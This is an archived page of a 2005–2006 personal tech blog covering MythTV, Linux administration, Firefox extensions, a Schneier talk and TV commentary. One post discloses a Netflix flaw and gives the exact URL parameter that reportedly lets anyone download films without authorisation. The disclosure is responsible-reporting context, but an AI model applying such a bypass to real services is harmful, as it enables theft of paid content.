codeblog code is freedom — patching my itch

May 16, 2006

catching up on Stargate

Filed under: Blogging,Health — kees @ 10:50 pm

I’ve been catching up on Stargate SG-1 ever since Bryce recommended it. I’d been resisting it, but with no more Firefly, Farscape, or StarTreks left to watch, it was inevitable.

At one point during my catch-up, I realized that I was watching 4 separate time-lines of the show. SciFi was showing new episodes on Fridays, a set of 3-in-a-row on Mondays, and a third chronology running Tue, Wed, Thu. On top of this, Fox(?) was playing re-runs on Fridays as well. About 30 episodes in, I totally lost it, and could not keep things straight. (“What? Where’d Daniel Jackson go? Who’s this guy?”)

To my rescue was my ever-faithful to serve as a base check-list for which shows I’d seen already, and the fantastic Stargate Wiki Episode Guide to help me remember which I’d already seen. (They even have full transcripts of the episodes! That’s dedication!)

It looks like very few of season 2 has aired, so I will have to turn to either the library or Netflix to fill the gaps. Once SG1 is gone, I will have to switch my daily exercise routine back to Buffy the Vampire Slayer. :)

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

May 12, 2006

sourceforge CVS re-check-out solution

Filed under: Blogging — kees @ 9:54 pm

SourceForge migrated to their new CVS server infrastructure recently (due to a catastophic disk failure of the old system), and told everyone that they had to re-check-out all their trees:

Hostname for CVS service

This change will require new working copies to be checked out of all
repositories (so control files in the working copy will point to the
right place). We will be updating the instructions we supply, but
instructions that your team has written within documentation, etc. will
need to be updated.

cvs co gaim

would be changed to

cvs co gaim

With 14 projects hosted there, with potentially multiple CVS modules in each, this wasn’t the best way for me to deal with the change. I had relocated several CVS trees at OSDL last year, so I went digging for my command line to do the updates. I was disappointed they didn’t suggest it in their email, so I offered my solution via their Tracker. Someone else (on Cygwin even) confirmed that it worked for them, and SourceF orge summarily closed the ticket (hence making it disappear from the Tracker where other people were seeking help). I can find no record of a change made to their documentation. In effect, they just eliminated my help (though they did thank me first).

It would be nice if SourceForge ran some kind of forum or Wiki on their site so people could help each other. I’ll have to remember this for the next Advisory Council.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

May 4, 2006

mythtv listing-update time-rotation

Filed under: Multimedia — kees @ 7:33 pm

A few months ago, zap2it‘s renewal survey included a set of questions that were not questions, but rather pleas that people move their database updates to a non-standard time. The default install of MythTV has a hard-coded time in the middle of the night to contact the zap2it servers for TV listing updates. Unfortunately, this means zap2it’s servers were (are?) getting crushed on the hour, across 4 time-zones, in the middle of the night.

To solve this little problem in MythTV, I turned off the built-in “mythfilldatabase” execution, and moved to doing it via crontab. zap2it said they had virtually no load during the day-time, so I moved the update to a little after noon, sticking the following in /etc/cron.d/mythtv-backend:

09 12 * * * mythtv mythfilldatabase –quiet

It dawned on me today while messing around with the “at” scheduler that I could actually randomize when during the day the mythfilldatabase runs. If you wanted to run the job anywhere in a 12 hour (720 minute) period after 9am, you could do it this way:

0 9 * * * mythtv echo “mythfilldatabase –quiet” | at + $(( RANDOM % 720 )) minutes

(My bash manpage says the low-order bits of $RANDOM are as random as the high-order bits, so this is “safe”. If you don’t trust your version of bash, you could use $(( 720 * RANDOM / 32767 )) instead. IANAMG*, YMMV, OMGPONIES.)

*I Am Not A Math Geek

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

careful with mysql downgrades

Filed under: Multimedia — kees @ 1:59 am

I ran into a nasty bug while attempting to downgrade a MySQL database. I had been running my MythTV machine on Debian Unstable, but recently reinstalled to Ubuntu. This has the unfortunate consequence of going from MySQL 4.1 to MySQL 4.0. The “mysqldump” option “–compat=mysql40” kind of forgets to include the “auto_increment” flag for tables creation. This caused my subsequent MythTV 0.18 to 0.19 upgrade attempt to instantly bomb, since all the INSERTs expecting the PRIMARY KEY to increment as new stuff was inserted … didn’t.

Once I split the dumps into tables (-t) and data (-d) with different “–compat” levels and hand-edited the tables, everything was “fine” again. I actually got the whole system up and on its feet again, with no loss of Stargate SG-1 episodes. ;)

So, now all I have to fight with is Xv on an old S3 card. Looks like new versions of Xorg don’t aim Xv to the right place. And, mysteriously, the S3 card’s Xv implementation lacks the XV_SWITCHCRT attribute, so I can’t just use “xvattr” to fix it, like I do I my laptop. Aaagh.

I wonder if something like the xorg.conf’s Option MonitorLayout “TV,CRT” might help it? I’ll try that tomorrow.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

May 3, 2006

fun with OpenID

Filed under: Blogging,Security,Web — kees @ 6:04 pm

While I can’t log into NetFlix or Amazon with OpenID (or other federated login systems), I still wanted to try it out. The goal is to easily write comments on people’s blogs, edit Wiki pages, etc, all without having to keep logging in every time. So far, so good.

First step was to decide between running my own OpenID server or not. I went with “not”, since there really isn’t an installable OpenID server yet (there are only support libraries, it seems). Since I was given a permanent account with LiveJournal for some XSS testing I did for them, I figured I’d just use their stuff. I wanted to use “” as my login everywhere, so I just added two lines to my HTML source:

<link rel=”openid.server” href=”” />
<link rel=”openid.delegate” href=”” />

Poof. Done. I used Videntity to verify that it was all working. Nifty stuff.

My only complaint is that it’s not clear how to get an end-to-end secure login. I can log into LiveJournal securely, but the OpenID server they run doesn’t seem to operate over HTTPS. Future study is needed. :)

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

April 30, 2006

slow debian mirror avoidance

Filed under: Networking — kees @ 8:02 pm has 4 mirror servers in their DNS round-robin. One of them ( is very slow (25Kb/s) for me. The others are blazing fast, especially (800Kb/s). I’ve gotten sick of having to hit Ctrl-C to abort an apt-get, and then restart it, hoping to get a better server out of the DNS.

Today, I added the following to my machine’s iptables config, so that it will just redirect all attempts from the slow mirror to the fast mirror:

iptables -t nat -A OUTPUT -p tcp -d –destination-port 80 -j DNAT –to-destination

If I wanted to do this for my whole network, I’d just slap this rule on my firewall and change “OUTPUT” to “PREROUTING”.

I love iptables.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

April 28, 2006

lvm article

Filed under: General — kees @ 2:14 pm

Bryce wrote a great article on LVM and disk management that I helped do some technical editing on. Hopefully stuff like this will help other people get more comfortable with LVM, and make it less of a dark art. :)

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

April 26, 2006

smallville, as measured in lana-minutes

Filed under: General — kees @ 7:00 am

I enjoy watching Smallville. I found Lana tiresome almost immediately. Recently, the writers teased us by showing an alternate future where she died. Struck with the possibility of not having to deal with her while watching the show, I became very excited. Then they brought the character back, and I couldn’t bear to continue watching the show. Every minute she’s on the screen is a minute stolen from me through the dark arts of terrible acting. If I didn’t so enjoy the rest of the plots and characters, I could so easily just stop watching. (I am also starting to run low on SG-1 episodes…)

To help combat my annoyance with Lana, I think I’m going to measure her screen-time. I’m going to count every minute that she’s on-screen and not dead, or when the on-screen plot is a direct result of her idoicy. (i.e. Clark complaining about something Lana did.) The goal will be to reach a “perfect episode” Lana-minute score of ZERO.

As a bonus, I figure I should also track Chloevage minutes. I figure Lana and Chloevage timers shouldn’t run if they’re both on screen at the same time — they cancel eachother; I am neither frowning nor smiling. The Chloevage-minutes would be a tie-breaker for episodes with nearly the same Lana-minutes value.

Ah, the physics of abstract television analysis.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

April 23, 2006

grub, yaird, mdadm, and missing drives

Filed under: General — kees @ 7:54 pm

This is basically a rant. I spent all my energy tracking down the problems, so I never did get things actually fixed. :P

I have my machines configured for software RAID between my primary and secondary drives. I always have. LILO supported this configuration back in RedHat 5.2 days. I’ve been doing RAID1 for a long time now. About a year ago, I changed my preference for boot loaders to GRUB, and just kind of assumed it handled mirroring. Well, much to my surprise, grub totally and completely does not handle mirrored configurations. Even the proclaimed fix didn’t work.

As a result of this “discovery”, I’ve switched back to LILO, which, I think, is a pain in the ass because it doesn’t actually have any filesystem-smarts built into it. (i.e. I have to re-run “lilo” every time I change a kernel or initrd.) I may see if another fix works as expected, but I don’t have a lot of hope considering the device map in the filesystem is the same for both grub drives, which is what causes the problems in the first place. (“Ieee! Where did the other drive go?!”)

So, moving forward, assuming my bootloader works, all kernels from 2.6.13 forward don’t support devfs, and the older initrd tools can’t handle that. Debian invented “yaird”. I had assumed they used the /sys filesystem and did other smart things. As it turns out, it’s fairly brain-dead. I booted without one of my mirrored drives, and yaird totally freaked out. As I discovered while digging through the initrd yaird generated, it just statically builds device nodes, based on what the running system used to look like.

There are two problems with this:

  1. DM devices (LVM, crypto, etc) are dynamically assigned. They may not have the same numbers after rebooting. This is mostly worked around by waiting for stuff to show up in /sys, so I’ll only complain about Ubuntu’s practice of encoding the major/minor numbers for the root device. (e.g. 0xFF00 — my root partition may not always be detected first) I don’t understand this, since the loader handles string-based paths for the root partition. But that’s not the bug I ran into for this rant.
  2. If a device goes missing, yaird assumes this is a bad thing. It has no concept of quorum. It could be argued that it shouldn’t, but in that case, it shouldn’t drop me to a prompt every time a device goes missing. It should only do that in “debug” mode. (I should send my patch for that in.)

While digging to open a Debian Bug report against yaird, I discovered that yaird, while annoyingly dropping me to a prompt (which I can “exit” out of), isn’t the real problem. The real problem is that “mdadm” incorrectly thinks it can’t start up the mirror with only 1 drive. There’s actually a counting bug where it just flat out thinks it needs 2 drives to start. Once I found this, I got pissed, “What? How could this bug exist?”

I proceeded to find the current source for mdadm, so I could write a patch to fix it. Only then did I discover that Debian’s version of mdadm is 5 REVISIONS BEHIND (including a major version jump)! AAAGGGh!

At this point I got in line reporting how old mdadm is, installed a work-around-mdadm patch to my yaird templates, and switched back to LILO. Ugh. And before someone yells “Run Gentoo!”, I checked already. The Gentoo mdadm version is old too. But at least they have a masked ebuild of the modern versions.

I hate choosing between stability and bleeding edge, but I don’t usually complain because I recognize the costs associated with stabilizing new stuff. But, come on, the mdadm 2.x series came out in AUGUST. That’s 8 months ago. I think that’s pretty stable! *sob*

I wish I had enough time to be a Debian maintainer instead of just sitting here and moaning, but hopefully my bug reports will do some good. :)

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

April 13, 2006

Bruce Schneier on attack trends

Filed under: Blogging,Security — kees @ 9:20 pm

On Wednesday I attended Bruce Schneier‘s short talk about the trends of online attacks. I figure I need to take his talk with at least a small grain of salt. While he has a reputation to maintain, he also works for a security outsourcing company. That in mind, I still like reading his blog, and I enjoyed hearing him talk.

The main take-away from his talk was that attackers are more rarely “hobbyists”, and more commonly criminals. (i.e. there is profit motive rather than an interest in boasting rights.) In the same vein, worms are becoming more sophisticated, quieter, and increasingly effective, while losing their cleverness. (Criminals don’t care if their worm is lame, they don’t care if they ripped off someone else’s worm, they care that their worm is staying undiscovered and is making them money. As a result, whole families of slightly different worms are appearing.)

One thing he said, that I have a hard time believing, and if true is pretty scary, is that cyber-crime profits are now exceeding drug profits. I would love to understand what the sources for that statistic are. Beyond just phishing, beyond worms waiting for you to authenticate to banks before emptying your wallet, there is even small-scale Denial-of-Service extortion. Generally, it’s against places that are themselves on tenuous legal ground, like offshore gambling sites. “If you don’t pay us $X, we’ll DoS you again!” It’s protection money online. Wild.

The market for blackhat exploits is growing. This is reducing the time between vulnerability announcement and exploit usage. Unfortunately, in the Microsoft world, an opposite trend is happening: patch speed is slowing due to their needing to test more and more configurations, staying infinitely backward compatible. At least this has an upside that their patches are generally better and corporations are learning to trust auto-update systems. (And I think this kind of brain-share is actually good for all OS vendors.)

The commoditization (and therefore homogenizing) of hardware and software means that everyone runs the same stuff. Even the criminals. Before, generally only the various corporations had old AS/400 machines and no one really wrote attacks against them. Now stuff runs on PCs.

Overall, the attacks online are becoming increasingly more damaging financially (“criminals are good at what they do”). The volume of attacks come from the open Internet, but the more successful attacks come from inside a private network. More worms are simply waiting for opportunity instead of beating on a network.

While some of the crime organizations have been taken down, there are still large bot networks that are continuing to grow in size even though they have no controller any more. This is truly something out of dystopic sci-fi. I don’t know why, but while I find the idea of full AIs reasonable, and totally non-intelligent systems reasonable, I find half-AI systems really creepy. They just keep doing some semi-smart thing over and over waiting until mommy comes back to tell them to do something else now.

He wound down discussing his worries for the future. He wants people thinking about VoIP security now. (Worms sniff your typing and packets already, soon they can sniff your voice.) He hinted at Digital Restrictions Management without actually saying DRM. (“Who owns your computer?” To which I thought, “I do. This is why Free Software is so important.”)

In closing he talked about security being more about usability than technology. I took that to mean “the Art of security is more about usability than technology.” I can have infinite security by just unplugging something. But that’s not very artful. Towards the goal of successful (artful) security, he wants to see service providers be ultimately liable for the financial damage. He figures this puts the motivations in the right place. It seems like the right thing to me (if credit card companies want to avoid it, it must be good for me) but I suspect there is something hidden deeper that may cause greater harm. I can’t put my finger on it, so for now, I’ll agree. :)

At one point he gave a nice view into his own world, in which he has to go twice a year and disinfect his own mother’s computer of worms. The cobbler’s childrens’ feet…

The end of the session was a book signing (Counterpane gave out gratis copies of Schneier’s new book “Beyond Fear“). I showed my geek by having brought a copy of “Applied Cryptography” for him to sign too. For which he was geek-prepared, and tossed in a cryptogram. Even though he does this for lots of people (Google told me later), it was fun to see it in my book; I wasn’t expecting it.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

April 11, 2006

construction movies

Filed under: Multimedia — kees @ 7:55 pm

From the time-lapse construction webcam I set up with Brian, I built a pair of AVIs. These were made with ffmpeg so they use the FMP4 codec. Windows folks can find ffdshow in a number of places.

Left view movie (31M), set to Delerium’s “Silence” (with Sarah Mclachlan).
Right view movie (24M), set to a remix of Everything But the Girl’s “Like the Deserts Miss the Rain”.

I tried to build these movies showing only day-light hours, on work days. A few holidays sneak in, though. (There’s a longer section of a few days where no one shows up for work across Thanksgiving, for example.)

The AVI frame rate is 25fps, with each frame jumping 10 minutes. The effective speed is 14400:1. They span the time from July 26 2005 through January 21 2006. (The right-side camera was added on August 29.)

My least favorite easter egg is where the room-light-shield I taped up to keep room glare off the camera peels off the window and hangs in front of one of the cameras during Christmas and New Year’s vacation (when no one was around to fix it).

My most favorite easter egg is near the latter half when a pile drilling rig is parked in the foreground. Over the course of the day, the hydraulics holding the drill up at an angle bleed out, and the drill slowly pitches forward. I just love it; it’s exactly the kind of event no one notices at the time because it’s happening so slowly. Seen in time-lapse, though, it’s very obvious — it’s the only thing moving at all! :)


© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

April 9, 2006

greasemonkey for RMLS

Filed under: Web — kees @ 8:15 pm

The house-for-sale listings that produces are very detailed, and even include a link to show a map for each house’s address. However, this link goes to MapQuest, which I find infuriatingly annoying to use. I wanted the link to at least go to Google Maps instead. Since I live near Portland, I also wanted to search the fantastic Portland Maps site at the same time. That way I could see lot dimensions, crime statistics, etc.

This was clearly a perfect job for GreaseMonkey. The result, after my usual fights with javascript, is my script to override the RMLS address mapping function.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

April 2, 2006

in honor of DST: SW

Filed under: Blogging — kees @ 7:56 am

Since I’ve lost an hour to Daylight Savings Time, I thought I’d record a list of links to Alternate Star Wars Theories.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

April 1, 2006

NetFlix movie downloading

Filed under: Multimedia,Vulnerabilities — kees @ 12:22 pm

Netflix accidentally lets you download movies for free. I reported this on March 18th, but they still haven’t replied. It’s been 2 weeks, so I’m posting the details now.

While digging through Netflix’s javascript I found a function named “startDownload“. I was originally just curious about the AJAX responsible for the movie info popup boxes, but this proved much more interesting.

I’m guessing they must be beta-testing this for some accounts because nothing visible through my account ever calls “startDownload“, but I could still use it.

Turns out the function handles a bitrate selection, and then just rewrites the URL a little. You can get the same affect by just adding “&download=avi&br=4” to the end of a movie info URL. For example, this is the URL to get info about Ice Age, and this is the URL to download Ice Age. This even seems to work without being logged in.

I haven’t had time to check if everything in their library is downloadable, but of the 6 or so I tried, they all worked. If anyone finds a cut-off date, let me know.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

March 27, 2006

presenting at OSCon 2006

Filed under: Blogging,Multimedia — kees @ 6:43 pm

Woohoo! I got accepted to present at OSCon again! I’m really excited about this one, too — I get to present about something non-work-related. The title of my presentation is “DVR Happiness: Gluing MythTV and TiVo together with Galleon“. Here is my proposed outline:

  1. Intro to DVRs
    • TiVo: have you been under a rock?
    • MythTV: learn all about video standards.
  2. TiVo Gets You A Lot
    • Hacked TiVos can do great things
    • Is your TiVo a tool or a toy?
    • Stock TiVos can do cool stuff too
    • ToGo: move video from TiVo to PC
    • GoBack: move video from PC to TiVo
    • MP3s: streaming from anywhere
    • Image Galleries: beyond just snapshots
    • Galleon Gets You More
    • Implements the server-side of TiVo features
    • On-the-fly format conversion
  3. MythTV Gets You The Most
    • Making Tivo recordings available to MythTV
    • Format conversion
    • Making MythTV recordings available to TiVo
    • Mounting a MythTV filesystem with FUSE
    • Making your MythTV remote make noises
    • Short-cuts with the Linux IR daemon

EDIT: WordPress pisses me off so very much when it comes to lists, indenting, and code snippets. Some day, I will switch to something that just lets me type in HTML and doesn’t try to “fix” it for me afterwards. *fume*

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

March 23, 2006

amd64 is okay

Filed under: General — kees @ 8:36 pm

I’m fairly happy with my amd64 box, but it has some bothers. It reminds me of switching from 16bit to 32bit applications back in the day. Since the SATA drivers were busted on every distro I tried to install, I ended up with Debian Unstable — probably because I know how to dance around needing a more recent kernel.

Audio wasn’t working right away, but it looks like ALSA has resolved the issues finally. These fancy new 6-channel chips are silly. Maybe in 5 years I’ll actually have something other than stereo speakers on my computer. :)

Switching to 64bit has really shown me all the non-free software I use, since I can’t run these 32bit-compiles natively anymore:

  • acroread
  • various proprietary A/V codecs (DLLs via MPlayer)
  • Flash plugin
  • Wine

Okay, so Wine and don’t run because of porting issues, but still. There have been two ways to solve these problems:

  • 32bit versions of various libraries
  • chroot to a 32bit environment

Installing 32bit libs is nice, but Debian isn’t smart enough to let me install .i386.deb files along with my .amd64.deb files. There’s got to be a way, but I haven’t figured it out. So, I followed the Ubuntu instructions, and built a 32bit chroot environment. Any time I want to watch something in Flash, I run “bash32” and run Mozilla in there, which has the Flash plugin. Same for OOo, etc. With the mount bindings (e.g. “mount -o bind /home /chroot/sid/home”) it’s like I never left home. Audio even works. Pretty slick solution.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

March 22, 2006

debugging firefox extensions

Filed under: Web — kees @ 6:15 pm

After installing my amd64 machine and getting my desktop moved, I noticed that Firefox seemed to be running really slowly. Especially google maps. After Brian showed me the Firefox Hacks book, I decided to try and dig into the cause.

By setting the environment variable “NSPR_LOG_MODULES=all:5” you see damn near everything Firefox is doing while it does it. I noticed that it was stalling every time it processed a new cookie (since I don’t let Google set cookies). So I started removing each of my cookie extensions.

To get myself back to a sane state, I just backed up my Firefox profile:

cp -a ~/.mozilla/firefox/*.default ~/firefox-profile

Then removed one extension, restarted Firefox, etc, until I found the busted one. Turns out “Extended Cookie Manager” was my problem, so I replaced it with “Cookie Button in the status bar”.

Tedious, but, it worked. And for some reason, getting a list of all the Firefox environment variables proves to be very difficult.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

March 5, 2006

sci-fi crew

Filed under: Blogging — kees @ 8:30 am
You scored as Moya (Farscape). You are surrounded by muppets. But that is okay because they are your friends and have shown many times that they can be trusted. Now if only you could stop being bothered about wormholes.

Moya (Farscape)
Babylon 5 (Babylon 5)
Bebop (Cowboy Bebop)
Millennium Falcon (Star Wars)
Serenity (Firefly)
SG-1 (Stargate)
Deep Space Nine (Star Trek)
Nebuchadnezzar (The Matrix)
FBI’s X-Files Division (The X-Files)
Enterprise D (Star Trek)
Galactica (Battlestar: Galactica)
Andromeda Ascendant (Andromeda)

Your Ultimate Sci-Fi Profile II: which sci-fi crew would you best fit in? (pics)
created with

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

January 18, 2006

mecha gone wild

Filed under: Blogging — kees @ 9:28 am

This has got to be the coolest use of an animated GIF ever:

walking mech

Even crazier, in Firefox, if you right-click to “View Image”, the favicon shown in the tab is animated too! I smell code re-use! That kicks ass. I wonder what level of hell I’d burn in if I made the favicon for my site animated.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

January 17, 2006

ngsec games

Filed under: Reverse Engineering,Security — kees @ 5:49 pm

Today I was reminded of the NGsec security games site from a DefCon CTF team-mate. (This game was actually used as a prequal for DefCon 10, which I didn’t go to. Ken told me stories about it, though.) I burned through stages 1-9 in about 45 minutes, and then hit stage 10 and was side-tracked learning about encrypted ELF binaries.

There continues to be no useful FOSS binary analyzers for this kind of reverse engineering. gdb just doesn’t even begin to cut it: it was made for (surprise!) debugging programs built by friendly compilers, not doing forensics on decidedly unfriendly, hand-crafted binaries . If Paul Graham and Richard Hamming are to be believed:

  1. What are the most important problems in your field?
  2. Are you working on one of them?
  3. Why not?

I should be writing a static binary analyzer. And a dynamic one too. GPL IDApro replacement. Yeow.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

January 16, 2006 and sendfile

Filed under:,Networking,Security — kees @ 4:50 pm

The “sendfile” system call is a way to send file contents directly out to a network socket. This saves time in userspace (so it doesn’t have to copy buffer contents around), and was one of the reasons I upgraded‘s Apache to version 2.x at the end of 2003 (because version 1.x doesn’t have sendfile support). A few weeks ago, one of the other admins discovered that files greater than 2G were not being delivered by Apache.

I had a lot of fun tracking down the issue. The “amount to send” argument in the sendfile call is a “size_t”, which is basically an “unsigned long”. Having a 2G limit didn’t make sense, since even with 32 bits, that should be a 4G limit. However, the servers are both 64bit, so as it turns out, “size_t” is a full 64 bits. After writing a quick test, I was able to verify that it was, indeed, a 31 bit limit on both 64 bit and 32 bit kernels. Peter Anvin took it from here, and tracked down the origin of the problem: filesystem operations greater than 31 bits in offset were being rejected deep in the kernel. He suggested truncating the request instead of returning a failure.

Seems as though Linus decided to limit the size of filesystem calls to make sure there aren’t security problems (signed vs unsigned overflows) in the various filesystem drivers, while people using the Linux kernel migrate more from 32bit to 64bit systems. Personally, I don’t agree with this, but from a practical stand-point, it hardly makes a difference. Instead of sending all 4G out the pipe and returning to user space, it just returns twice, sending 2G per call.

This should be fixed in 2.6.16. Until then, we could patch Apache to keep it’s offset request under 31 bits, but we’ll probably just tell people to use FTP, since vsftpd doesn’t use sendfile yet.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

January 14, 2006

open source as prior art

Filed under: General — kees @ 6:41 pm

I’m involved in the Open Source as Prior Art initiative. The goal being to more readily make FOSS available as prior art for the US Patent and Trade Office to use while examining software patent applications, reducing the number of poorly issued software patents.

This is a rather touchy area given the fact that most FOSS proponents (myself included) would rather see software patents go away completely. However, in the US, this is not likely to happen any time soon, since it’s not up to the USPTO, it’s up to the US Legislature; the USPTO has to implement the law, which puts them in a bind since they’re not very successful right now at finding prior art (and the laws surrounding prior art discovery aren’t that helpful either). In my opinion, if the USPTO could reliably find prior art, they would start rejecting almost all software patent applications, and the futility of software patenting would become clear to those that didn’t already recognize it. If I’m wrong, then I’d hope that with the very few patents issued, innovation really would return to the system.

Groklaw has already discussed the OSaPA project and the overall “Patent Quality Improvement” initiatives announced by the USPTO. I’ve read these and several other articles, each ranging from praise to scepticism, looking for more thoughts on subject, trying to help me shape my opinions.

One of the most sceptical was written by Greg Aharonian from the Internet Patent News Service (which ironically has no online archives for me to link to). His scepticism is mostly aimed at the USPTO and IBM, and not directly at the various initiatives, past or present. His fundamental point is that the USPTO doesn’t appear to have manged to use the (voluminous) resources it already has at its fingertips, so why would adding more help the situation? This approach didn’t work in the past, and there’s no indication that anything has changed in the USPTO to make it a success this time around.

I don’t have the historical background to know if it’s a fair assessment, but I enjoyed his analogy:

“[…] IBM is Lucy, PTO management is Charley [sic] Brown, and these fake initiatives to improve patent quality are the football that the PTO keeps on trying to kick, only to be fooled again and again.”

One thing I think he may have missed, though, was that the OSaPA initiative contains another player. The initiative itself may again be the football, and the USPTO and IBM may again be playing, just as with prior (seemingly failed) initiatives. However, this time, the FOSS community is involved. I like to think that in Greg’s analogy, the FOSS community is Charles Schultz. We can draw any damn comic we want, and we’ll still be around after the initiatives, IBM, and the USPTO are long forgotten. The FOSS community is on the multi-hundred year plan, the same as any other sustainable cultural plan. If Greg’s predictions come to pass, and it really does turn out to be a waste of time, I still have faith that it’ll only be the USPTO (and, unfortunately, the US) getting hurt. To borrow from John Gilmore, FOSS will treat this as a defect, and route around it.

Regardless of history, I sincerely hope the USPTO takes this novel chance to harness the power of the FOSS community. We’re interested in helping them solve their problems, and if the USPTO drops the ball, it’s unlikely the FOSS community will ever look back.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

January 7, 2006

cheap auto-rotoscoping

Filed under: Multimedia — kees @ 2:35 pm

In the back of my head, I’ve been wondering about various ways I could use my $20 camcorder. Making cheap movie shorts, like SNL’s “Lazy Sunday” come to mind. There are no fancy zooms or special effects. It’s all editing and audio. Bryce kicked some ideas my way, most of which include using the dogs and/or cats as the primary actors (I can pay them in kibble). He also suggested renewing my father’s Rottweiler Camcorder with a much smaller device. I think the images would be mostly obscured by my dog’s chin. We’ll see. I also worry it may suffer from being summarily ingested.

While playing Name that Tune 80s DVD Edition, the a-ha video for “Take On Me” came on. The rotoscoping used to create the animated parts made me think of Inkscape‘s autotracing function, and I lept up to go investigate the possibilities.

So far, I’ve played with two styles. One leaves the autotraced fill areas (which makes a video look like a really freaky cartoon), and one that reduces the fill opacity, and adds line density so it looks more like a regular outlined cartoon. That one tends to be distracting, though, since the edges keep jumping all over the place.

The autorotoscope script requires mplayer, ImageMagick, autotrace, and ffmpeg.

Here are the results:

These AVIs use xvid for their video codec. If you don’t already have it, you can get them from here.

© 2006 – 2015, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

January 3, 2006

my firefox extensions

Filed under: Web — kees @ 11:50 pm

I’ve gotten all my Firefox extensions straightened out again since the 1.5 shake-up. Now that it’s sane, I wanted to report what I’m using so I’ll remember for the future, and so I can go look somewhere if I’m on my laptop or some other machine and I can’t remember which extension I was looking for.

Also at least one other person has asked me what extensions I’m using, so maybe others would be interested. I used the following to get a human-readable list of my extensions:

egrep ':(version|name|description|type)' ~/.mozilla/firefox/*.default/extensions.rdf | \
perl -pe 'print "\n" if (/:version/); s/^[^=]+="//; s/"$//;' | \
(read EMPTY; while read VER; do \
  read NAME; read DESC; read TYPE; read EMPTY; \
  if echo "$TYPE" | grep \>2\<>/dev/null; then \
    echo "$NAME $VER"; echo "$DESC"; echo ""; \
  fi; \

I bet there is an elegant XPath command to extract this directly with a single “perl” execution, but, uhm, I’m not an XML expert. :)

Almost all of these extensions were gotten from the Firefox extensions list:

  • BugMeNot (0.9) Bypass compulsory web registration with the context menu via
  • Tabbrowser Preferences ( Enhances control over some aspects of tabbed browsing.
  • Modify Headers (0.5.1) Add, modify and filter http request headers
  • View Rendered Source Chart (1.2.03) Creates a Colorful Chart of a Webpage’s Rendered Source
  • Gcache (0.2.1) Displays a google cached version of the webpage.
  • Adblock ( Filters ads from web-pages
  • Word Count (0.3) Counts the number of words in selected text.
  • Allow Right-Click (0.3) Defeats web sites’ right-click prevention scripts.
  • JavaScript Options (1.2.2) Provides advanced JavaScript options for Firefox.
  • User Agent Switcher (0.6.6) Adds a menu and a toolbar button to switch the user agent of the browser.
  • Live HTTP Headers (0.11) View HTTP headers of a page and while browsing.
  • Download Manager Tweak (0.7.1) A modification of the Firefox download manager that changes its appearance and allows it to be opened in a separate window, a new tab, or the sidebar.
  • View Cookies (1.5) View cookies of the current web page.
  • udtranslate (0.0.7) UDTranslate: a zombie translation utility for Urban Dead
  • Stop-or-Reload Button (0.2) Turns the stop and reload buttons into a single one. When you can stop, you have a Stop button, otherwise you have a Reload button. (Like in Safari)
  • QuickJava (0.4.1) Allows quick enable and disable of Java and Javascript from statusbar.
  • Flashblock (1.5) Replaces Flash objects with a button you can click to view them.
  • Greasemonkey (0.6.4) A User Script Manager for Firefox
  • Fasterfox (1.0.1) Performance and network tweaks for Firefox.
  • Disable Targets For Downloads (1.0) Prevents download links opening a blank window.
  • QuickProxy (2005.12.04) Quickproxy creates a statusbar button to quickly turn the proxy on and off.
  • DownThemAll! ( The mass downloader for Firefox.
  • Web Developer (0.9.4) Adds a menu and a toolbar with various web developer tools.
  • Wayback (0.1.1) Displays an archived version of the webpage.
  • Extended Cookie Manager (0.5.5) Change the cookie status for websites on demand.

In addition, it seems the option in TabBrowserPreferences for URL pasting into the display window to load was removed. After some Googling, I was directed to the about:config page, under “middlemouse.contentLoadURL”. Set it to true to restore the prior default behavior.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

December 23, 2005


Filed under: Multimedia — kees @ 2:58 pm

My first working crack at getting a filesystem overlay working between MythTV, Galleon, and my TiVo is finished. If you’re brave, check it out.

© 2005 – 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

December 22, 2005

galleon and FUSE

Filed under: Multimedia — kees @ 9:46 pm

